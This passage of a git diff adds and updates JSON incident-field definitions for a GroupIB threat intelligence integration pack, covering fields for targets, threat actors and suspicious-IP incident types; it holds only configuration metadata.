100644 index 000000000000..78f61b57f7bc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json @@ -0,0 +1,35 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "caseInsensitive": true, + "cliName": "gibscannersources", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "gibscannersources", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Scanner Sources", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "5.0.0", + "toVersion": "99.99.99" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json index 9cd12eac659c..523c7e4dd46e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json new file mode 100644 index 000000000000..9f3f697f2916 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibservicedomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibservicedomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json new file mode 100644 index 000000000000..1c6ea3003f9c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibserviceip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibserviceip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json new file mode 100644 index 000000000000..68de7970242e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibserviceurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibserviceurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json index c76e39ec4538..7e3460152396 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json @@ -8,7 +8,22 @@ "GIB OSI Git Leak", "GIB OSI Public Leak", "GIB Targeted Malware", - "GIB Data Breach" + "GIB Data Breach", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibseverity", @@ -32,5 +47,32 @@ "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Data Breach", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json new file mode 100644 index 000000000000..1f77f1031bf5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Socks Proxy" + ], + "caseInsensitive": true, + "cliName": "gibsocksproxysource", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibsocksproxysource", + "isReadOnly": false, + "locked": false, + "name": "GIB Socks Proxy Source", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Socks Proxy" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json index 38176fb2d4a6..c27126a6711f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json @@ -4,7 +4,28 @@ "GIB Targeted Malware", "GIB OSI Git Leak", "GIB Compromised Card", - "GIB Compromised Account" + "GIB Compromised Account", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Public Leak", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP Socks Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB Data Breach" ], "caseInsensitive": true, "cliName": "gibsource", @@ -29,5 +50,34 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware", + "GIB OSI Git Leak", + "GIB Compromised Card", + "GIB Compromised Account", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Public Leak", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP Socks Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB Data Breach" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json new file mode 100644 index 000000000000..6e7ff41a0d54 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetasn", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetasn", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target ASN", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json index 247c80113bae..1f4a8eecf489 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing Kit", + "GIB Brand Protection Phishing" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json index c5c98a2716ca..a4daf2c01b6c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json new file mode 100644 index 000000000000..34e511f6ed64 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetcity", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetcity", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target City", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json index 3a0ed77e19c4..da145a39e926 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Phishing" + "GIB Brand Protection Phishing", + "GIB Attacks Deface" ], "caseInsensitive": true, "cliName": "gibtargetdomain", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Attacks Deface" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json new file mode 100644 index 000000000000..219fb62f7ce4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetdomainprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetdomainprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Domain Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json new file mode 100644 index 000000000000..8c09bf43c333 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json new file mode 100644 index 000000000000..6d5a3071edc2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json new file mode 100644 index 000000000000..21f388997f08 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetregion", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetregion", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Region", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json new file mode 100644 index 000000000000..f286c696d6ff --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibthreatactorcountry", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibthreatactorcountry", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Threat Actor Country", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json index 79b72dfebadc..3b8bcf53658a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json @@ -3,7 +3,12 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibthreatactorid", @@ -27,5 +32,17 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json index e928560011c3..1656be418b4c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json @@ -3,7 +3,14 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibthreatactorname", @@ -27,5 +34,19 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json index 2f925629a332..f024738791bc 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json @@ -3,7 +3,14 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Card Group", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibthreatactorisapt", @@ -27,5 +34,19 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Compromised Card Group", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json new file mode 100644 index 000000000000..3f0ef881ef36 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json @@ -0,0 +1,65 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibthreatactorstable", + "closeForm": true, + "columns": [ + { + "displayName": "ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "id", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibthreatactorstable", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Threat Actors Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json new file mode 100644 index 000000000000..8c82d13fe262 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibthreatlevel", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibthreatlevel", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Threat Level", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json index 53e5378ce17a..1d9e465473f4 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Brand Protection Phishing" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json new file mode 100644 index 000000000000..3024f796bdfa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibupdatetime", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibupdatetime", + "isReadOnly": false, + "locked": false, + "name": "GIB Update Time", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json new file mode 100644 index 000000000000..f5d6103a84e2 --- /dev/null +++ 